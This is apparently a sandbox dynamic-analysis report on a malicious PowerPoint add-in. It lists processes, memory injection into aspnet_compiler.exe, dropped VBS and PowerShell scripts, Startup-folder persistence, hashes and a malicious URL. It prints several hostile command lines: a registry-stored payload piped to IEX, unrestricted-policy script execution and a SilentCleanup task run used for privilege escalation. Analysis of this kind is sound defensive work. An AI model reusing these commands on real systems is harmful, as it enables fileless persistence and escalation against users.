C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\warning[1]

1.04 KB5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9

System 101

Module 116

File 47

Environment 5

Registry 169

- 5

Keyboard 2

Mutex 1

Window 15

COM 40

- 3

Process 16



Network Behavior

Type Count

HTTP 2

HTTPS 2

TCP 3



Process #14: aspnet_compiler.exe

Injection Information (6)

Injection Type Source Process Source / Target TID Address / Name Size Success Count

Host Behavior

Type Count

ID 14

File Name c:\windows\microsoft.net\framework\v4.0.30319\aspnet_compiler.exe

Command Line #cmd





Return Code 1073807364

PID 3584

Parent PID 3828

Bitness 32 Bit

Modify Memory

#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe

0xd08 0x400000(4194304) 0x200 1

Modify Memory


0xd08 0x402000(4202496) 0x35600 1

Modify Memory


0xd08 0x438000(4423680) 0x400 1

Modify Memory


0xd08 0x43a000(4431872) 0x200 1

Modify Memory


0xd08 0x7efde008(2130567176) 0x4 1

Modify Control Flow


0xd08 / 0xba0 - 1

Registry 60

Process 2

File 21

Module 70

Window 3

System 9

User 2

- 32

COM 33

Environment 5



Network Behavior

Type Count

HTTP 1

TCP 1




ID 15


Command Line #Powershell






PID 2180

Parent PID 3828

Bitness 32 Bit




Injection Information (6)

Injection Type Source Process Source / Target TID Address / Name Size Success Count

Host Behavior

Type Count

ID 16


Command Line #Powershell






PID 2188

Parent PID 3828

Bitness 32 Bit

Modify Memory


0xd08 0x400000(4194304) 0x200 1

Modify Memory


0xd08 0x402000(4202496) 0x35600 1

Modify Memory


0xd08 0x438000(4423680) 0x400 1

Modify Memory


0xd08 0x43a000(4431872) 0x200 1

Modify Memory


0xd08 0x7efde008(2130567176) 0x4 1

Modify Control Flow


0xd08 / 0x890 - 1

Registry 4

File 19

Module 4

Window 3

System 2

User 1



Process #18: wscript.exe

Host Behavior

Type Count

ID 18

File Name c:\windows\syswow64\wscript.exe

Command Line "C:\Windows\System32\WScript.exe" "C:\Users\Public\Chrome.vbs"





Return Code 0

PID 2548

Parent PID 3928

Bitness 32 Bit

System 15

Module 22

Registry 27

- 1

Window 2

COM 5

File 4

Process 1




Host Behavior

Type Count

ID 19


Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\run.ps1





Return Code 0

PID 2660

Parent PID 2548

Bitness 32 Bit

Environment 27

File 160

System 15

Registry 82

Process 1

Module 5

- 22

- 1



Process #20: schtasks.exe

Host Behavior

Type Count

ID 20

File Name c:\windows\syswow64\schtasks.exe

Command Line "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I





Return Code 1

PID 3700

Parent PID 2660

Bitness 32 Bit

System 2

Module 7

COM 1

File 10




Host Behavior

Type Count

ID 21

File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe

Command Line powershell.exe ((gp HKCU:\Software).cookerr)|IEX






PID 3680

Parent PID 2812

Bitness 64 Bit

System 2

Module 1

File 1

Environment 4



Process #22: wscript.exe

Host Behavior

Type Count

ID 22

File Name c:\windows\syswow64\wscript.exe

Command Line "C:\Windows\System32\WScript.exe" "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.vbs"





Return Code 0

PID 3404

Parent PID 3928

Bitness 32 Bit

System 15

Module 22

Registry 27

- 1

Window 2

COM 5

File 4

Process 1




ID 23


Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\msi.ps1






PID 292

Parent PID 3404

Bitness 32 Bit



ARTIFACTS

File

SHA256 File Names Category File Size MIME Type Operations Verdict

dc82cadcaad72e4f7aa996a149126ecb15e652606e55a12efcb994a16f5159a9

c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\rijuql1c\9_17[1].html

Downloaded File 32.91 KB text/html - MALICIOUS

329199d138adcc51a8bd2e72401c2e64be9a1e8f3009dc2dc3774ac9deb5f1b7

c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\x9ohk109\9[1].html

Downloaded File 86.98 KB text/html - MALICIOUS

8e59758c7dba0ca744790644a23fa08c1e416e8f38ee221868b6560a2c915b51

C:\Users\kEecfMwgj\Desktop\9_pdf.ppam

Sample File 8.80 KB

application/vnd.openxmlformats-officedocument.presentationml.presentation

- MALICIOUS

6cc209598f4fa921559ad80d0d75cd214f4d021d39884b59811d69ac98125b2c

c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\index.dat

Modified File 48.00 KB application/octet-stream - CLEAN

224d95cce08108610c46ef4134793dbdd619e43e90e9d9cf42716a08f45222f9

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\PMMR5K9K\3822632116-css_bundle_v2[1].css, C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\3822632116-css_bundle_v2[1].css

Downloaded File 36.12 KB text/plain Access, Read CLEAN

5993c37fe8dfca6e242e6e5b7c48ae99c9d41a8fe3d209dd38a0d161516b519a

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\PMMR5K9K\3046902713-ieretrofit[1].js


01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\authorization[1].css, C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\authorization[1].css

Downloaded File 1 bytes application/octet-stream Access, Read CLEAN

9d358297f944faf6cfd24e3069ef42fa2aaef6fe243b61389a9a02c8d6de9a50

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\2583860411-widgets[1].js


068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\cookienotice[1].js, C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\cookienotice[1].js


0fc52ef116f03fd95f9857856f1e2cbdfa2cacc398e066db0d8d5481739bc2d7

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\RIJUQL1C\281434096-static_pages[1].css


21cc4dc6c3c01b84c808004173f42e3ed1b4f09551a10d69b4cec7394a1590e6

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\3101730221-analytics_autotrack[1].js


3e6e1c58507746b01dd0f74cd9d40c885ffaea0cc025eb4f27c4c947916f2068

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\PMMR5K9K\css[1].txt

Downloaded File 172 bytes text/plain Access, Read CLEAN

e61660c659c426e45bce2937dddb01af6b550502a2904546575c1ec2ba1121dd

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\RIJUQL1C\analytics[1].js





8684a32d1a10d050a26fc33192edf427a5f0c6874c590a68d77ae6e0d186bd8a

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\maia[1].css


01e698231e9d93dceaa9a97f4e5cdbdbceefbea67d4e39acd0391e1cae00889b

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\mem5YaGs126MiZpBA-UN_r8OUuht[1].eot

Downloaded File 15.60 KBapplication/vnd.ms-fontobject

Access, Read CLEAN

22f8356c61b22b8a6506465087d48d831303e10c66bd3ced965f6a32a7302dde

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN[1].eot


Access, Read CLEAN

49d0d1473181447caad524188bfcb1344b20a4ffa42bb0b5ff7695e379ae3b79

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\RIJUQL1C\css[1].txt

Downloaded File 402 bytes text/plain Access, Read CLEAN

f0da44c78fae13b0c7078626f17f4b5b60ef9e396d6cfc5cec5304d17c358d1a

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\PMMR5K9K\pxiDypQkot1TnFhsFMOfGShVF9eK[1].eot


Access, Read CLEAN

be869a73a160440e8bfc5c7d84a907febd61075d920d51c7d0097d7295c865cd

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\RIJUQL1C\KFOmCnqEu92Fr1Mu4mxO[1].eot


Access, Read CLEAN

1adc32fffc15aee5a186eb7a6fd12a09c377c83665289589c94058df73a9de19


Dropped File 8.99 KB application/octet-stream Access, Create, Write, Read CLEAN

61e40c1da7fd6964108819d35ac2641ec11f80d18f81b3fdc361612e6060bf8c

C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\OneDrive.vbs,C:\Users\Public\OneDrive.vbs

Dropped File 398 bytes text/plainDelete, Write, Access,Create, Read

CLEAN

7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\error[1], C:\Users\kEecfMwgj\AppD......t.IE5\RIJUQL1C\error[1], C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\error[1]

Dropped File 3.17 KB text/html Access, Create, Write CLEAN

0b113b5594ea4cfeb6346d6f997c2dd8a1623037a855b9f896093ec1e1426811

c:\users\keecfmwgj\appdata\roaming\microsoft\windows\cookies\keecfmwgj@blogger[1].txt

Dropped File 97 bytes text/plain - CLEAN

bf0a747e7005ace88140897c4c166749eaffcd9f96286c431fa3409709a0b344

c:\users\keecfmwgj\appdata\roaming\microsoft\windows\cookies\keecfmwgj@blogger[2].txt

Dropped File 195 bytes text/plain - CLEAN

966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\error[1], C:\Users\kEecfMwgj\AppD......t.IE5\RIJUQL1C\error[1], C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\error[1]

Dropped File 4.12 KB text/plain Access, Create, Write CLEAN

5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\warning[2], C:\Users\kEecfMwgj\Ap... ...5\MM5O9XQS\warning[1], C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\RIJUQL1C\warning[1]

Dropped File 1.04 KB image/gif Access, Create, Write CLEAN

049d229c448e844e1e6d7e30478d986f549c05471764db32ee349f494c3e1314

C:\Users\Public\alosh.ps1 Dropped File 12.46 KB text/plainDelete, Write, Access,Create, Read

CLEAN




76e20cb044db745f7065bff4d5bb09c16d83ca1d17f615fa2e41e1d68f1cde17

C:\Users\Public\run.ps1 Dropped File 559 bytes text/plainDelete, Write, Access,Create, Read

CLEAN

7993a1c616e7d70074f3508ee8fb3d5b709f2a6894cd5a3fceff1630503a6513

C:\Users\Public\test.ps1 Dropped File 374 bytes text/plainDelete, Write, Access,Create, Read

CLEAN

03b7e264915f482ca3499e842e8e71a2186c67f067adbd222059302da7b320f7

C:\Users\Public\vb.vbs Dropped File 495 bytes text/plainDelete, Write, Access,Create, Read

CLEAN

febb4719018181cf1dc5ed66812439e8c0a8b982a18c2e77354986804b71c1fa

C:\Users\Public\Chrome.vbs Dropped File 236 bytes text/plainDelete, Write, Access,Create, Read

CLEAN

2dc8d9262332f8848cc09468086d4c38fc1c5b9aac4619a42fc1c5634b979d1f

- Downloaded File 152 bytes text/html - CLEAN

ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99

- Downloaded File 889 bytes application/octet-stream - CLEAN

167b9eed2d5009b99c0010be91da509c0cf52e388517053ac48cab5b4ba94a76


58d607271f942eac12dcd237fd5333660a39517fab938ee95f0ce9234238360b


dfe0f74a965b963675ff78e07d226005aa7b5a93d2e6e6df98b45bee442406d1

- Downloaded File 2.70 KB text/html - CLEAN

7474f8408ddf635ab3531f751ecc3f0dc474823d74baac91ee43e63c05ba0979

- Downloaded File 384 bytes text/plain - CLEAN

bd9df047d51943acc4bc6cf55d88edb5b6785a53337ee2a0f74dd521aedde87d


25a34aed1f1f78b098376e9e7b6785fa7eaf3d9281192ff5e3915e6083ec8450

c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\rijuql1c\blogin[1].g

Downloaded File 149.99 KB text/html - CLEAN

cbad27c35fbc84e2da4280476adeb197566db2750b8b4a79eb7e872db8d8acb7

c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\mm5o9xqs\blogger-logotype-color-black-1x[1].png

Downloaded File 1.13 KB image/png - CLEAN

0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd

c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\x9ohk109\body_gradient_tile_light[1].png, c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\pmmr5k9k\body_gradient_tile_light[1].png

Downloaded File 95 bytes image/png - CLEAN

ecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044

c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\pmmr5k9k\gradients_light[2].png, c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\pmmr5k9k\gradients_light[1].png

Downloaded File 403 bytes image/png - CLEAN

e2cc2fa5b12df505e33dd1b9741d8a58696f0f06ea4b488a468590971f28c17b

- Downloaded File 534.72 KB text/plain - CLEAN

818fbd88425db09ce3b0f82df9795a1504b885a1680da06332b394e8a2a88e24

- Downloaded File 44.67 KB text/plain - CLEAN

387af277a3e8c36dcdb13e5688cdcbfb6b94fb325fbdccf2b326cf207f036cad




Filename

File Name Category Operations Verdict

C:\Windows\SysWOW64\mshta.exe Accessed File Access CLEAN

Win.ini Accessed File Access, Read CLEAN

C:\Windows\SysWOW64\mshtml.dll Accessed File Access CLEAN

System Paging File Accessed File Access CLEAN

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\3822632116-css_bundle_v2[1].css

Downloaded File Access, Read CLEAN

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\3046902713-ieretrofit[1].js


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\authorization[1].css


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\css[1].txt


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\maia[1].css


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\mem5YaGs126MiZpBA-UN_r8OUuht[1].eot


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\281434096-static_pages[1].css


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\cookienotice[1].js



Dropped File Access, Create, Write CLEAN

C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\analytics[1].js


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\error[1]


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\warning[1]


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\2583860411-widgets[1].js


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\error[1]


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\MM5O9XQS\kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN[1].eot


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\3101730221-analytics_autotrack[1].js


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\error[1]


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\warning[1]




C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\warning[1]


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\error[2]


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\css[1].txt


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\PMMR5K9K\pxiDypQkot1TnFhsFMOfGShVF9eK[1].eot





C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\RIJUQL1C\KFOmCnqEu92Fr1Mu4mxO[1].eot


C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\warning[2]


C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Accessed File Access CLEAN

C:\Windows\system32\%SystemRoot%\system32\WindowsPowerShell\v1.0\

Accessed File Access CLEAN

C:\Windows\system32 Accessed File Access CLEAN

C:\Windows\system32\schtasks.exe Accessed File Access CLEAN

C:\Windows Accessed File Access CLEAN

C:\Windows\System32\Wbem Accessed File Access CLEAN

C:\Windows\System32\WindowsPowerShell\v1.0\ Accessed File Access CLEAN

C:\Program Files (x86)\Microsoft Office\root\Client Accessed File Access CLEAN

C:\Program Files (x86)\Microsoft Office\Root\Office16\ Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.psd1 Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.psm1 Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.cdxml Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.xaml Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.ni.dll Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.dll Accessed File Access CLEAN

C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement


C:\Program Files\WindowsPowerShell\Modules\PowerShellGet Accessed File Access CLEAN

C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1

Accessed File Access, Read CLEAN

C:\Windows\SysWOW64\schtasks.exe Accessed File Access CLEAN


Dropped File Access, Create, Write, Read CLEAN

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config


C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1


C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1


C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml


C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml


C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll





C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1


C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config


C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en-US\PowerShellGet.psd1


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en\PowerShellGet.psd1


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Resource.psd1


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGetModuleInfo.xml


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll


C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll


C:\Users\kEecfMwgj\Documents\WindowsPowerShell\Modules Accessed File Access CLEAN

C:\Program Files (x86)\WindowsPowerShell\Modules Accessed File Access CLEAN

C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.psd1 Accessed File Access CLEAN

C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.psm1 Accessed File Access CLEAN

C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.cdxml Accessed File Access CLEAN

C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.xaml Accessed File Access CLEAN

C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.ni.dll Accessed File Access CLEAN

C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.dll Accessed File Access CLEAN

C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement


C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet Accessed File Access CLEAN




C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1


C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1


C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1


C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml


C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml


C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll


C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en-US\PowerShellGet.psd1


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en\PowerShellGet.psd1


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Resource.psd1


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGetModuleInfo.xml


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll


C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll


C:\Windows\system32\WindowsPowerShell\v1.0\Modules Accessed File Access CLEAN

C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.psd1





C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.psm1


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.cdxml


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.xaml


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.ni.dll


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.dll


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE Accessed File Access CLEAN

C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1





Reduced dataset

C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll


C:\ProgramFiles\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility


C:\ProgramFiles\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll


C:\Program Files(x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility


C:\Program Files(x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1


C:\Program Files\ESET\ESET Security\ecmds.exe Accessed File Access CLEAN

C:\Program Files\Avast Software\Avast\AvastUI.exe Accessed File Access CLEAN

C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe Accessed File Access CLEAN

C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe Accessed File Access CLEAN

C:\Program Files\AVG\Antivirus\AVGUI.exe Accessed File Access CLEAN

C:\Users\Public\OneDrive.vbs Dropped FileDelete, Write, Access,Create, Read

CLEAN

C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll


C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll




URL

URL Category IP Address Country HTTP Methods Verdict

http://1230948%[email protected]/p/9.html

- 216.58.212.161 - GET MALICIOUS

